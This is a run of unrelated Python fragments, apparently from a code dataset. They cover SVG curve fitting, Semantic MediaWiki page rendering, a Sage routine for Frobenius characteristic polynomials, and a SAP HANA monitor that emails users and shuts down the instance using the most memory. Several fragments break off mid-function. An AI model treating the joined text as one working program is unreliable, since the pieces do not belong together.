r.append(u * knots[i] + v * knots[i + 1] - m * r[i-1])
p[n-1] = r[n-1] / f[n-1]
for i in range(n-2, -1, -1):
p[i] = (r[i] - p[i+1]) / f[i]
p[n] = (3 * knots[n] - p[n-1]) / 2
for i in range(n):
p1, p2 = knots[i], knots[i+1]
c1, c2 = p[i], 2 * p2 - p[i+1]
self.path_commands[i] = SVGCommandBezier(p1, c1, c2, p2)
return self
def simplify_heuristic(self):
return self.copy().split(max_dist=2, include_lines=False) \
.simplify(tolerance=0.1, epsilon=0.2, angle_threshold=150) \
.split(max_dist=7.5)
def simplify(self, tolerance=0.1, epsilon=0.1, angle_threshold=179., force_smooth=False):
# https://github.com/paperjs/paper.js/blob/c044b698c6b224c10a7747664b2a4cd00a416a25/src/path/PathFitter.js#L44
points = [self.start_pos, *(path_command.end_pos for path_command in self.path_commands)]
def subdivide_indices():
segments_list = []
current_segment = []
prev_command = None
for i, command in enumerate(self.path_commands):
if isinstance(command, SVGCommandLine):
if current_segment:
segments_list.append(current_segment)
current_segment = []
prev_command = None
continue
if prev_command is not None and prev_command.angle(command) < angle_threshold:
if current_segment:
segments_list.append(current_segment)
current_segment = []
current_segment.append(i)
prev_command = command
if current_segment:
segments_list.append(current_segment)
return segments_list
path_commands = []
def computeMaxError(first, last, curve: SVGCommandBezier, u):
maxDist = 0.
index = (last - first + 1) // 2
for i in range(1, last - first):
dist = curve.eval(u[i]).dist(points[first + i]) ** 2
if dist >= maxDist:
maxDist = dist
index = first + i
return maxDist, index
def chordLengthParametrize(first, last):
u = [0.]
for i in range(1, last - first + 1):
u.append(u[i-1] + points[first + i].dist(points[first + i-1]))
for i, _ in enumerate(u[1:], 1):
u[i] /= u[-1]
return u
def | |
<filename>wikifile/smw.py
'''
Created on 2021-03-07
@author: wf
'''
from __future__ import annotations
from typing import TYPE_CHECKING
from tabulate import tabulate
from wikifile.utils import Widget, Itemize, PageLink, WikiSon, SubObject, TemplateParam, SetProperties, SwitchFunction, \
MagicWord
if TYPE_CHECKING:
from wikifile.wikiRender import WikiRender
from wikifile.metamodel import Topic, Property, UML, Context
class SMWPart(object):
'''
a technical Semantic MediaWiki Part
'''
def __init__(self, part, wikiRender=None):
'''
Constructor
'''
self.part = part
self.wikiRender = wikiRender
self.template = "%s_page.jinja" % part.lower().replace(" ", "_")
def render_page(self, topic: Topic):
"""
Renders the help page for the given entity using the provided properties
Args:
topic: topic for which the page should be rendered
properties: list of all properties
Returns:
"""
template_template = self.wikiRender.template_env.get_template(self.template)
page = template_template.render(topic=topic)
return page
@staticmethod
def getAll(wikiRender: WikiRender):
smwPartList = [
ListOf(wikiRender),
SMWPart("Help"),
SMWPart("Category"),
SMWPart("Concept"),
Form(wikiRender),
Template(wikiRender),
#TODO: implement
#SMWPart("Properties"),
#SMWPart("PythonCode")
]
smwParts = {}
for smwPart in smwPartList:
smwPart.wikiRender = wikiRender
smwParts[smwPart.part] = smwPart
return smwParts
def get_page_name(self, topic: Topic):
return f"{self.part}:{topic.name}"
@staticmethod
def getAllAsPageLink(topic: Topic):
"""Returns all technical pages of the given topic as link list (also known as the see also section)"""
return SMW.render_as_list([f"[[:{smwPart.get_page_name(topic)}]]" for smwPart in SMWPart.getAll(None).values()])
class SMW:
"""Provides functions covering basic SMW features"""
@staticmethod
def parser_function(function_name: str, presence_is_true=False, **kwargs):
"""
Renders the given parameters and function name to the corresponding SMW parser function.
Parameter names containing a whitespace must be written with an underscore instead.
Args:
function_name: name of the function
presence_is_true: If true only the name of bool parameters is displayed. Otherwise the bool value is printed out.
**kwargs: parameters of the parser function
Returns:
"""
return "{{#" + function_name + ":" + SMW.render_parameters(presence_is_true=presence_is_true, **kwargs)[1:] + "}}"
@staticmethod
def render_entity(template: str, oneliner=True, **kwargs):
"""
Renders the given parameters as template of the given name.
Args:
template: name of the template
oneliner= If True entity is returned in oneliner. Otherwise the entity is rendered in a prettier format.
**kwargs: parameters of the template
Returns:
Example:
Args:
template="Event"
oneliner= False
kwargs= 'Title'='SMWCon', 'Year'='2020'
Returns:
{{Event
|Title= SMWCon
|Year= 2020
}}
"""
separator = "" if oneliner else "\n"
return "{{" + template + separator + SMW.render_parameters(oneliner=oneliner, **kwargs) + "}}"
@staticmethod
def render_sample_entity_with_properties(topic: Topic, properties: list, oneliner=True):
"""
Args:
topic: Topic for which the sample entity template should be generated
properties: properties of the topic
oneliner: If true the result will be in one line. Otherwise, result string is returned in a prettier format.
Returns:
Example:
Args:
template="Event"
properties= [<Title property>, <Year property>]
oneliner= False
Returns:
{{Event
|Title= Some Title
|Year= Some Year
}}
"""
property_dict = {}
for property in properties:
property_dict = {**property_dict, property.name: f"Some {property.label}"}
return SMW.render_entity(topic.name, oneliner=oneliner, **property_dict)
@staticmethod
def render_parameters(oneliner=True, presence_is_true=False, **kwargs):
"""
Args:
oneliner: If true parameters are rendered in one line.
presence_is_true: If true only the name of bool parameters is displayed. Otherwise the bool value is printed out.
**kwargs: All paramerters with there values. If a parameter has a whitespace escape it with an underscore.
Returns:
Returns the given parameters as rendered mediawiki template parameters
"""
separator = "" if oneliner else "\n"
res = ""
for parameter, value in kwargs.items():
if isinstance(value, bool):
label = parameter.replace("_", " ")
if presence_is_true:
if value:
res += f"|{label}{separator}"
else:
# ToDo: Update bool values if decided how to query wiki config
bool_value = "true" if value else "false"
res += f"|{label}={bool_value}{separator}"
elif value is not None:
label = parameter.replace("_", " ")
res += f"|{label}={value}{separator}"
return res
@staticmethod
def set_entity_parameter(topic, properties, oneliner=True, withDescription=False):
"""
Args:
topic: topic for which the properties should be set
properties: properties which should be stored
oneliner: If true the result will be in one line. Otherwise, result string is returned in a prettier format.
Returns:
"""
property_dict = {"isA": topic.name}
for property in properties:
property_dict = {**property_dict, property.get_pageTitle(withNamespace=False): "{{{" + property.name + "|}}}"}
return SMW.parser_function("set", oneliner=oneliner, **property_dict)
@staticmethod
def render_as_list(data: list, is_ordered=False, prefix=""):
"""
Renders the given data as mediawiki list. If a value in the data is also a list a sublist entry is generated.
Args:
data: data that should be rendered as list. Can also contain lists.
is_ordered: If true an ordered list is returned based on the order in the given data. Otherwise, unordered list is returned.
prefix: string that is placed before each list item
Returns:
"""
symbol = prefix
symbol += "#" if is_ordered else "*"
res = ""
for d in data:
if isinstance(d, list):
res += SMW.render_as_list(d, is_ordered, symbol)
else:
res += f"{symbol}{d}\n"
return res
class TemplatePage(Widget):
"""
Renders the Template page of a given Topic
"""
def __init__(self, topic:Topic):
self.topic=topic
self.template="<noinclude>\n{templatePage}\n</noinclude><includeonly>\n{templateRender}\n</includeonly>"
@property
def viewmodes(self) -> dict:
viewmodes = {
"queryTable": Query(mainlabel="-").select(
f"-Has subobject::{MagicWord('PAGENAME')}").printout_list_of_properties(self.topic.properties).render(),
"hidden": "",
"masterdetail": None, # fallthrough
"#default": Template.table_of_arguments(self.topic, self.topic.properties, escape=True)
}
return viewmodes
@property
def storemodes(self) -> dict:
templateParamMapping=self.topic.templateParamMapping
properties={templateParamMapping[prop.name] if prop.name in templateParamMapping else prop.name:prop for prop in self.topic.properties}
topicProperties = {prop.get_pageTitle(withNamespace=False): TemplateParam(name) for name, prop in properties.items()}
storemodes = {
"subobject": SubObject("-", **topicProperties, isA=self.topic.name),
"property": None, # fallthrough
"#default": SetProperties(**topicProperties) # default
}
return storemodes
def render(self):
topicPropertySamples={prop.get_pageTitle(withNamespace=False):"some value" for prop in self.topic.properties}
template=f"""<noinclude>
This is the template {PageLink(Template.get_page_name(self.topic))}.
== See also ==
{ Itemize([PageLink(smwPart.get_page_name(self.topic)) for smwPart in SMWPart.getAll(None).values()]) }
== Usage ==
<pre>
{ WikiSon(self.topic.name, topicPropertySamples) }
</pre>
{ WikiSon(self.topic.name, topicPropertySamples) }
[[Category:Template]]
</noinclude><includeonly>
{ SwitchFunction(TemplateParam('storemode', defaultValue='property'), **self.storemodes)}
{ SwitchFunction(TemplateParam('viewmode'), **self.viewmodes)}
[[Category:{ self.topic.name }]]
</includeonly>
"""
return template
class Template(SMWPart):
"""
Provides methods to generate a Template page for a topic
"""
def __init__(self, wikiRender=None):
if wikiRender is not None:
wikiRender.template_env.globals['Template'] = self
super().__init__("Template", wikiRender)
@staticmethod
def get_page_name(topic: Topic):
return f"Template:{topic.name}"
@staticmethod
def template_arg(arg):
return "{{{" + arg + "|}}}"
@staticmethod
def table_of_arguments(topic:Topic, properties:list=None, clickable_links:bool=True, setProperties:bool=False, escape:bool=False):
"""
Generate a media wiki table for each property of the topic and display their values
Args:
topic(Topic): Topic for which the table should be generated
properties(list): List of properties to display in the table. If None all properties of the given topic are used
clickable_links(bool): If True the property names will link to the Property page
setProperties(bool): IF True the properties will be set for the entity.
escape(bool): If True the returned table will have an escaped pipe char
Returns:
string of an mediawiki table displaying the properties of the given topic
"""
formlink = Form.formlink(form=topic.name, link_text="✎", target="{{FULLPAGENAME}}", tooltip="Start editing this " + topic.name)
sortBySortPos = lambda property: 99999 if "sortPos" not in property.__dict__ or property.__dict__.get("sortPos") is None else int(property.sortPos)
properties_sorted = sorted(properties, key=sortBySortPos)
table=Table(css_class="wikitable", escape=escape)
tableHeader=f"{formlink} {topic.get_page_link()}"
table.add_row().add_cell(colspan=2,is_header=True, content=tableHeader)
for property in properties_sorted:
row=table.add_row()
label = property.get_description_page_link() if clickable_links else property.label
row.add_cell(is_header=True, style="text-align:left", content=label)
if setProperties: # set the property for the entity
value=f"[[{property.get_pageTitle(withNamespace=False)}::{'{{{'} {property.name}|{'}}}'}]]"
else: # just display the raw value
value=Template.template_arg(property.name)
row.add_cell(content=f"{'{{'}#if:{Template.template_arg(property.name)}|{value}|{'}}'}")
return table.render()
class ListOf(SMWPart):
"""
Provides methods to generate a List of page for a topic
"""
def __init__(self, wikiRender=None):
super().__init__("List of", wikiRender)
@staticmethod
def get_page_name(topic: Topic):
return f"List of {topic.pluralName}"
class Form(SMWPart):
"""
Provides methods to render a complete Form or parts of a Form.
For more details see: https://www.mediawiki.org/wiki/Extension:Page_Forms
"""
regexps = {
'Regexp:NaturalNumber': {
'regexp': "/^[0-9]+$!^$/",
'message': 'Must be a Number',
'or char': '!'
}
}
def __init__(self, wikiRender=None):
if wikiRender is not None:
wikiRender.template_env.globals['Form'] = self
super().__init__("Form", wikiRender)
#self.template = "event_form.jinja"
@staticmethod
def get_page_name(topic: Topic):
return f"Form:{topic.name}"
@staticmethod
def page_form_function(tag, **kwargs):
"""
ToDo
Args:
tag: Type of the form function. e.g.: field, form, info, ...
**kwargs: parameters of the form function
Returns:
"""
return "{{{" + tag + SMW.render_parameters(presence_is_true=True, **kwargs) + "}}}"
@staticmethod
def standard_input_tag(input, oneliner=True, **kwargs):
"""
Renders standard input tag
For more detail see: https://www.mediawiki.org/wiki/Extension:Page_Forms/Defining_forms#'standard_input'_tag
Args:
input: If list the standard input tag is generated for each item in the list with the given parameters. Otherwise, the standart input tag is generatde for the given input
oneliner: If true result will beone string line. Otherwise, multiple standard input tags will result in multiple lines.
**kwargs: parameters of the standard input tag. If the parameter contains whitespace escape it with underscore.
Returns:
"""
if isinstance(input, list):
res = ""
for tag in input:
res += Form.standard_input_tag(tag, oneliner, **kwargs)
return res
| |
r"""
Computation of the Frobenius polynomial using Newton's identities
"""
# *****************************************************************************
# Copyright (C) 2018 <NAME> <<EMAIL>>
# Distributed under the terms of the GNU General Public License (GPL)
# https://www.gnu.org/licenses/
# *****************************************************************************
from __future__ import division
from sage.rings.integer_ring import ZZ
from sage.functions.log import log
def charpoly_frobenius(frob_matrix, charpoly_prec, p, weight, a=1, known_factor=[1]):
"""
Return the characteristic polynomial of the given Frobenius matrix.
INPUT:
- ``frob_matrix`` -- a matrix representing the Frobenius matrix up to some precision
- ``charpoly_prec`` -- a vector ai, such that, `frob_matrix.change_ring(ZZ).charpoly()[i]`
will be correct mod `p^ai`, this can be easily deduced from the Hodge numbers and
knowing the q-adic precision of ``frob_matrix``
- ``p`` -- prime `p`
- ``weight`` -- weight of the motive
- ``a`` -- `q = q^a`
- ``known_factor`` -- the list of coefficients of the known factor
OUTPUT:
A list of integers corresponding to the characteristic polynomial of the Frobenius action
EXAMPLES::
sage: from sage.schemes.cyclic_covers.charpoly_frobenius import charpoly_frobenius
sage: M = Matrix([[O(17), 8 + O(17)], [O(17), 15 + O(17)]])
sage: charpoly_frobenius(M, [2, 1, 1], 17, 1, 1)
[17, 2, 1]
sage: R = Zq(17**2 , names=('a',))
sage: M = Matrix(R, [[8*17 + 16*17**2 + O(17**3), 8 + 11*17 + O(17**2)], [7*17**2 + O(17**3), 15 + 8*17 + O(17**2)]])
sage: charpoly_frobenius(M*M, [3, 2, 2], 17, 1, 2)
[289, 30, 1]
sage: M = Matrix([[8*31 + 8*31**2 + O(31**3), O(31**3), O(31**3), O(31**3)], [O(31**3), 23*31 + 22*31**2 + O(31**3), O(31**3), O(31**3)], [O(31**3), O(31**3), 27 + 7*31 + O(31**3), O(31**3)], [O(31**3), O(31**3), O(31**3), 4 + 23*31 + O(31**3)]])
sage: charpoly_frobenius(M, [4, 3, 2, 2, 2], 31, 1, 1)
[961, 0, 46, 0, 1]
sage: M = Matrix([(4*43^2 + O(43^3), 17*43 + 11*43^2 + O(43^3), O(43^3), O(43^3), 17 + 37*43 + O(43^3), O(43^3)),
....: (30*43 + 23*43^2 + O(43^3), 5*43 + O(43^3), O(43^3), O(43^3), 3 + 38*43 + O(43^3), O(43^3)),
....: (O(43^3), O(43^3), 9*43 + 32*43^2 + O(43^3), 13 + 25*43 + O(43^3), O(43^3), 17 + 18*43 + O(43^3)),
....: (O(43^3), O(43^3), 22*43 + 25*43^2 + O(43^3), 11 + 24*43 + O(43^3), O(43^3), 36 + 5*43 + O(43^3)),
....: (42*43 + 15*43^2 + O(43^3), 22*43 + 8*43^2 + O(43^3), O(43^3), O(43^3), 29 + 4*43 + O(43^3), O(43^3)),
....: (O(43^3), O(43^3), 6*43 + 19*43^2 + O(43^3), 8 + 24*43 + O(43^3), O(43^3), 31 + 42*43 + O(43^3))])
sage: charpoly_frobenius(M, [5, 4, 3, 2, 2, 2, 2], 43, 1, 1)
[79507, 27735, 6579, 1258, 153, 15, 1]
sage: M = Matrix([(1 + O(4999), O(4999), 0, 0),
....: (O(4999), 4860 + O(4999), 0, 0),
....: (0, 0, O(4999), O(4999)),
....: (0, 0, O(4999), 1 + O(4999))])
sage: charpoly_frobenius(M, [2, 1, 1], 4999, 1, 1, [1, -2 ,1 ])
[4999, 139, 1]
TESTS::
sage: M = Matrix([[-149196156000219, 0, 0, 0, 0, 0, 0, 0],
....: [0, 76324364094257, 0, 0, 0, 0, 0, 0],
....: [0, 0, 76324364094257, 0, 0, 0, 0, 0],
....: [0, 0, 0, -149196156000219, 0, 0, 0, 0],
....: [0, 0, 0, 0, 281855171388275, 0, 0, 0],
....: [0, 0, 0, 0, 0, -208983379482579, 0, 0],
....: [0, 0, 0, 0, 0, 0, -208983379482579, 0],
....: [0, 0, 0, 0, 0, 0, 0, 281855171388275]])
sage: charpoly_frobenius(M, [9, 8, 7, 6, 5, 5, 5, 5, 5], 1009, 1, 2)
[1074309286591662654798721,
561382189105547134612,
-2982540407204025062,
-247015136050256,
4390163797795,
-242628176,
-2877542,
532,
1]
sage: M = Matrix([[0, 0, 0, -338082603, 0, 0, 0, 0],
....: [0, 0, -317436968, 0, 0, 0, 0, 0],
....: [0, -120741807, 0, 0, 0, 0, 0, 0],
....: [200618482, 0, 0, 0, 0, 0, 0, 0],
....: [0, 0, 0, 0, 0, 0, 0, 123492519],
....: [0, 0, 0, 0, 0, 0, 426826171, 0],
....: [0, 0, 0, 0, 0, 157417117, 0, 0],
....: [0, 0, 0, 0, 373415235, 0, 0, 0]])
sage: charpoly_frobenius(M, [7, 6, 5, 4, 3, 3, 3, 3, 3], 1009, 1, 1)
[1036488922561, 0, 270809546, 0, -1474149, 0, 266, 0, 1]
sage: M = Matrix({(0, 31): 1814236329200021268558465351501717,
....: (1, 30): 3268331092352160631300311212049390,
....: (2, 29): 1002349136486054751305109007707560,
....: (3, 28): 1789497403160078628636360424523308,
....: (4, 19): 919866278512654133838788268427125,
....: (5, 18): 2918980842679879118243999587726673,
....: (6, 17): 2062741569795231121341967954037400,
....: (7, 16): 3562554496811633214919332352788305,
....: (8, 7): 287823825201170974551150606916601,
....: (9, 6): 2657175570144838727074228404244845,
....: (10, 5): 3200631048273888400670606576807785,
....: (11, 4): 707085630754978281870563133348521,
....: (12, 39): 679572779843478608532167180287595,
....: (13, 38): 510867456922807824071915371084390,
....: (14, 37): 3300741705093235469798877501619286,
....: (15, 36): 1374430202827161695034370373469332,
....: (16, 27): 1897240889699239396313755822318254,
....: (17, 26): 3171751877741319729745976757727266,
....: (18, 25): 1151779650995750952707414056498421,
....: (19, 24): 1309748952162524211332312241346156,
....: (20, 15): 2914640274871541651939754878647777,
....: (21, 14): 2524322227034087814555116576604052,
....: (22, 13): 693999428630644346611319813759997,
....: (23, 12): 2093267437436875555592094407087011,
....: (24, 3): 101158112439244133585487537448909,
....: (25, 2): 638873050956374173808321501215560,
....: (26, 1): 3529335795023815426485172749287314,
....: (27, 0): 618726320422582798159865537548600,
....: (28, 35): 2510605595766272594980682702750921,
....: (29, 34): 2978146199632282120435531158312695,
....: (30, 33): 1724161588290366191539756998844438,
....: (31, 32): 516507426627993787229114955328811,
....: (32, 23): 1716672265998537901154333190869011,
....: (33, 22): 3787144776814278856737374038432424,
....: (34, 21): 3765560528316833596614887925578722,
....: (35, 20): 1628311006615824767735977131865996,
....: (36, 11): 3638935478569769465046956942756848,
....: (37, 10): 1878821491042105813643148323053706,
....: (38, 9): 1187568624951630613061547491748348,
....: (39, 8): 2538351040819233009959661983810741}
....: )
sage: charpoly_frobenius(M,
....: [31, 30, 29, 28, 27, 26, 25, 24, 23, 22, 21, 20, 19, 18, 17, 16,
....: 15, 14, 13, 12] + [11]*21, 1129, 1, 1)
[11320844849639649951608809973589776933203136765026963553258401,
0,
0,
0,
0,
0,
0,
0,
0,
0,
24687045654725446027864774006541463602997309796,
0,
0,
0,
0,
0,
0,
0,
0,
0,
20187877911930897108199045855206,
0,
0,
0,
0,
0,
0,
0,
0,
0,
7337188909826596,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1]
sage: F = Matrix(Qp(17),
....: [(28442601332527957763, 729848492961404015, 70994086070709920),
....: (24928804992606688137, 1345506389644311177, 147442915782003034),
....: (7562462964206075698, 1262441299395996535, 92309755559576133)])
sage: F+= F.base_ring()(0).add_bigoh(6)*ones_matrix(*F.dimensions())
sage: charpoly_frobenius(F, [6, 5, 4, 4], 17, 2)
[-4913, -221, 13, 1]
"""
assert known_factor[-1] == 1
try:
cp = frob_matrix.change_ring(ZZ).charpoly().list()
except ValueError:
# the given matrix wasn't integral
cp = frob_matrix.charpoly().change_ring(ZZ).list()
assert len(charpoly_prec) == len(cp) - (len(known_factor) - 1)
assert cp[-1] == 1
# reduce cp mod prec
degree = len(charpoly_prec) - 1
mod = [0] * (degree + 1)
for i in range(len(charpoly_prec)):
mod[-i] = p**charpoly_prec[-i]
cp[-i] = cp[-i] % mod[-i]
# figure out the sign
# i.e., if it is a reciprocal or an antireciprocal polynomial
if weight % 2 == 1:
# for odd weight the sign is always 1
# it's the charpoly of a USp matrix
# and charpoly of a symplectic matrix is reciprocal
sign = 1
else:
# For the moment I will not worry about this case
if known_factor != [1]:
raise NotImplementedError()
# we compare ith coefficient and (degree - i)th coefficient to deduce the sign
# note, if degree is even, the middle coefficient will not help us determine the sign
for i in range((degree + 1)//2):
# Note: degree*weight is even
p_power = p**min(
charpoly_prec[i],
charpoly_prec[degree - i] + ((a * (degree - 2 * i) * weight) // 2),
)
if cp[i] % p_power != 0 and cp[degree - i] % p_power != 0:
other = cp[degree - i] * p**((a * (degree - 2 * i) * weight) // 2)
if (cp[i] + other) % p_power == 0:
sign = -1
else:
sign = 1
assert (-sign * cp[i] + other) % p_power == 0
break
# halfdegree is the number of coefficients that we will compute
# the rest will be deduced using the functional equation
# as up to scaling of the variable
# the polynomial is either reciprocal or antireciprocal polynomial
# note, this includes the middle coefficient if degree is even
halfdegree = degree // 2 + 1
cp[0] = sign * p**((a * degree * weight) // 2) # Note: degree*weight is even
# calculate the i-th power sum of the roots and correct cp along the way
e = cp[-halfdegree:]
e.reverse()
for k in range(halfdegree):
if k % 2 != 0:
e[k] = -e[k] % mod[degree - k]
# e[k] = cp[degree - k] if (k%2 ==0) else -cp[degree - k]
if k > 0:
# verify if p^charpoly_prec[degree - k] > 2*degree/k * q^(w*k/2)
assert (
log(k) / log(p) + charpoly_prec[degree | |
{2} is consuming highest "
"({3}%) memory.".format(sid, server_name, user_name, mem_usage),
location_id)
self._monitor.get_os_operator().shutdown_hana(ssh, os)
Mu.log_info(self.__logger,
"HANA:{0} on {1} shutdown is processed.".format(sid, server_name),
location_id)
if email is not None and len(email) > 0:
# sending email to the owner of the instance
email_to = [email]
email_body = ("Dear {0}, \n\n{1} is running out of memory, your {2} is "
"shutting down because it's consuming highest memory. "
"If this SID is very important and you do not want "
"it to be shut down next time, please contact administrator"
" to mark it as an important SID. \n -- this is only a testing email "
"your hana will not be shut down really, please do it manually."
"\n\nRegards,\nHANA OS "
"Monitor".format(employee_name, server_name, sid))
Mu.log_debug(self.__logger, "[MEM] Sending email to:{0} for "
"shutting down HANA.".format(email_to), location_id)
Mu.send_email(Mc.get_db_email_sender(self._monitor.get_db_operator(), self.__logger),
email_to,
"[MONITOR.MEM] {0} on {1} is Shutting Down".format(sid, server_name),
email_body,
self._monitor.get_db_operator().get_email_admin(location_id))
else:
Mu.log_info(self.__logger,
"HANA:{0} on {1} shutdown is processed, "
"but no email configured.".format(sid, server_name),
location_id)
finally:
self._monitor.get_os_operator().close_ssh_connection(ssh)
def __get_highest_memory_consumer(self, top5_mem_consumers, server_id, location_id):
# get the consumer which consuming highest memory, skip the important server
# highest_consumer = max(top5_mem_consumers, key=lambda x: x["USAGE"])
if not top5_mem_consumers:
return None
for i in range(0, len(top5_mem_consumers)):
sid = Mu.get_sid_from_sidadm(top5_mem_consumers[i]["USER_NAME"])
if self._monitor.get_db_operator().is_important_server(sid, server_id):
Mu.log_debug(self.__logger,
"skip the important SID:{0} in server (id):{1}".format(sid, server_id),
location_id)
continue
return top5_mem_consumers[i]
def __check_disk_notify(self, server_info, location_id):
"""check the disk for the provided server.
If current disk is less than the predefined threshold, will send the warning email to the top 5
disk consumers.
"""
server_id = server_info[Mc.FIELD_SERVER_ID]
server_name = server_info[Mc.FIELD_SERVER_FULL_NAME]
disk_free = server_info[Mc.FIELD_DISK_FREE]
disk_total = server_info[Mc.FIELD_DISK_TOTAL]
free_disk_threshold = ((100 - Mc.get_db_disk_usage_warn_threshold(self._monitor.get_db_operator(),
self.__logger)) * disk_total) / 100
Mu.log_debug(self.__logger,
"Server:{0}, free disk:{1}, threshold:{2}".format(server_name, disk_free, free_disk_threshold),
location_id)
if disk_free is not None and disk_free < free_disk_threshold:
# sending warning email to top 5 disk consumers
top5_disk_consumers = self._monitor.get_db_operator().get_top5_disk_consumers(server_id)
Mu.log_debug(self.__logger,
"Server ({0}), top 5 disk consumers:{1}".format(server_name, top5_disk_consumers),
location_id)
# If it's not working time, skip following part (Sending email)
if not Mu.is_current_time_working_time():
Mu.log_info(self.__logger, "Skip sending email because of the non-working time.")
return
email_to = [consumer["EMAIL"] for consumer in top5_disk_consumers if consumer["EMAIL"] is not None]
Mu.log_debug(self.__logger, "[DISK] Sending email to:{0}".format(email_to), location_id)
Mu.send_email(Mc.get_db_email_sender(self._monitor.get_db_operator(), self.__logger),
email_to,
"[MONITOR.DISK] {0} is Running Out of Disk".format(server_name),
Mu.generate_email_body(server_info, Mc.SERVER_INFO_DISK, top5_disk_consumers),
self._monitor.get_db_operator().get_email_admin(location_id))
def __check_monitoring_status_and_email(self, check_id, location_id):
"""check whether there are some servers which all the three stages monitoring process are failed,
and send mail to administrators to warn this."""
servers = self._monitor.get_db_operator().get_failed_servers(check_id, location_id)
if not servers:
return
# If it's not working time, skip following part (Sending email)
if not Mu.is_current_time_working_time():
Mu.log_info(self.__logger, "Skip sending email for failed server(s) {0} "
"because of the non-working time.".format(servers))
return
subject = "[MONITOR.TASKS] failed on {0} servers".format(len(servers)) \
if len(servers) > 1 else "[MONITOR.TASKS] failed on 1 server"
body = "Monitoring process failed on:"
for server in servers:
body = "".join([body, "\n\t", server])
body = "".join([body,
"\n",
"Normally the monitoring process failed because of the connection not working, "
"please have a check with the relative connection(s)."])
Mu.send_email(Mc.get_db_email_sender(self._monitor.get_db_operator(), self.__logger),
self._monitor.get_db_operator().get_email_admin(location_id),
subject,
body)
def __check_cpu_notify(self, server_info, location_id):
"""check the cpu for the provided server.
If current cpu utilization is higher than the predefined threshold, will send the warning email to the top 5
cpu consumers.
"""
server_id = server_info[Mc.FIELD_SERVER_ID]
server_name = server_info[Mc.FIELD_SERVER_FULL_NAME]
cpu_usage = server_info[Mc.FIELD_CPU_UTILIZATION]
cpu_threshold = Mc.get_db_cpu_usage_warn_threshold(self._monitor.get_db_operator(), self.__logger)
Mu.log_debug(self.__logger,
"Server:{0}, cpu usage:{1}, threshold:{2}".format(server_name, cpu_usage, cpu_threshold),
location_id)
if cpu_usage is not None and cpu_usage > cpu_threshold:
# sending warning email to top 5 CPU consumers
top5_cpu_consumers = self._monitor.get_db_operator().get_top5_cpu_consumers(server_id)
Mu.log_debug(self.__logger,
"Server ({0}), top 5 cpu consumers:{1}".format(server_name, top5_cpu_consumers),
location_id)
# If it's not working time, skip following part (Sending email)
if not Mu.is_current_time_working_time():
Mu.log_info(self.__logger, "Skip sending email because of the non-working time.")
return
email_to = [consumer["EMAIL"] for consumer in top5_cpu_consumers if consumer["EMAIL"] is not None]
Mu.log_debug(self.__logger, "[CPU] Sending email to:{0}".format(email_to), location_id)
Mu.send_email(Mc.get_db_email_sender(self._monitor.get_db_operator(), self.__logger),
email_to,
"[MONITOR.CPU] {0} is Running Out of CPU Resource".format(server_name),
Mu.generate_email_body(server_info, Mc.SERVER_INFO_CPU, top5_cpu_consumers),
self._monitor.get_db_operator().get_email_admin(location_id))
class HANAServerOSOperatorService:
""" Server OS side operator, responsible for all shell command operations, it's designed as singleton.
To get the instance of this class: HANAServerOSOperatorService.instance()
Initialize the class using HANAServerOSOperatorService() will raise an exception.
"""
__instance = None
@staticmethod
def instance():
"""static access method for singleton"""
if HANAServerOSOperatorService.__instance is None:
HANAServerOSOperatorService()
return HANAServerOSOperatorService.__instance
def __init__(self):
if HANAServerOSOperatorService.__instance is not None:
raise MonitorOSOpError("This class is a singleton, use HANAServerOSOperatorService.instance() instead")
else:
HANAServerOSOperatorService.__instance = self
self.__suse_dao = SUSEMonitorDAO()
self.__redhat_dao = RedHatMonitorDAO()
self.__server_info = {}
# base64.b64decode(Mc.SSH_DEFAULT_PASSWORD).decode("utf-8")
self.__os_passwd = Mu.get_decrypt_string(Mc.get_rsa_key_file(), Mc.get_ssh_default_password())
self.__os_user = Mc.get_ssh_default_user()
self.__logger = Mu.get_logger(Mc.LOGGER_MONITOR_SERVER_OS_OPERATOR)
def __get_dao(self, server_os=None):
if server_os is None or len(server_os) == 0:
Mu.log_debug(self.__logger, "The relative server does not have 'OS' information, using default value.")
server_os = Mc.get_ssh_default_os_type()
# raise MonitorOSOpError("The relative server does not have 'OS' information, failed at '__get_dao'")
return self.__suse_dao if "SUSE" in server_os.upper() else self.__redhat_dao
def open_ssh_connection(self, server_name, user_name=None, user_password=None):
if user_name is None or user_password is None:
user_name, user_password = self.__os_user, self.__os_passwd
Mu.log_debug(self.__logger, "Trying to connect {0}.".format(server_name))
ssh = self.__get_dao().open_ssh_connection(server_name, user_name, user_password)
if ssh is not None:
Mu.log_debug(self.__logger, "Connected {0}.".format(server_name))
return ssh
def close_ssh_connection(self, ssh):
self.__get_dao().close_ssh_connection(ssh)
def __init_server_info_dict(self, server_id):
self.__server_info[server_id] = {Mc.FIELD_DISK_TOTAL: None,
Mc.FIELD_DISK_FREE: None,
Mc.FIELD_MEM_TOTAL: None,
Mc.FIELD_MEM_FREE: None,
Mc.FIELD_CPU_NUMBER: None,
Mc.FIELD_CPU_UTILIZATION: None,
Mc.FIELD_OS: None}
def __set_server_info(self, server_id, info_type, *args):
if len(args) < 2:
Mu.log_error(self.__logger, "Error in __set_server_info, number of arguments < 2")
return
if server_id not in self.__server_info:
self.__init_server_info_dict(server_id)
if info_type == Mc.SERVER_INFO_MEM:
self.__server_info[server_id][Mc.FIELD_MEM_TOTAL] = args[0]
self.__server_info[server_id][Mc.FIELD_MEM_FREE] = args[1]
elif info_type == Mc.SERVER_INFO_CPU:
self.__server_info[server_id][Mc.FIELD_CPU_NUMBER] = args[0]
self.__server_info[server_id][Mc.FIELD_CPU_UTILIZATION] = args[1]
elif info_type == Mc.SERVER_INFO_DISK:
self.__server_info[server_id][Mc.FIELD_DISK_TOTAL] = args[0]
self.__server_info[server_id][Mc.FIELD_DISK_FREE] = args[1]
elif info_type == Mc.SERVER_INFO_OS:
self.__server_info[server_id][Mc.FIELD_OS] = args[0]
self.__server_info[server_id][Mc.FIELD_KERNEL] = args[1]
def reset_server_info(self, server_id):
"""reset the __server_info to empty value"""
if server_id in self.__server_info:
self.__init_server_info_dict(server_id)
def collect_disk_info(self, ssh, server_id, mount_point, os):
"""collect disk info, including total size and unused size"""
if Mc.use_simulator_4_disk():
# use simulator is USE_SIMULATOR is True
total_size, unused_size = OSSimulator.simulate_collect_disk_info()
else:
os_output = self.__get_dao(os).collect_disk_info(ssh, mount_point)
if os_output is None:
Mu.log_warning(self.__logger, "Can not get disk info for server:{0}, "
"mount_point:{1}.".format(server_id, mount_point))
total_size = -1
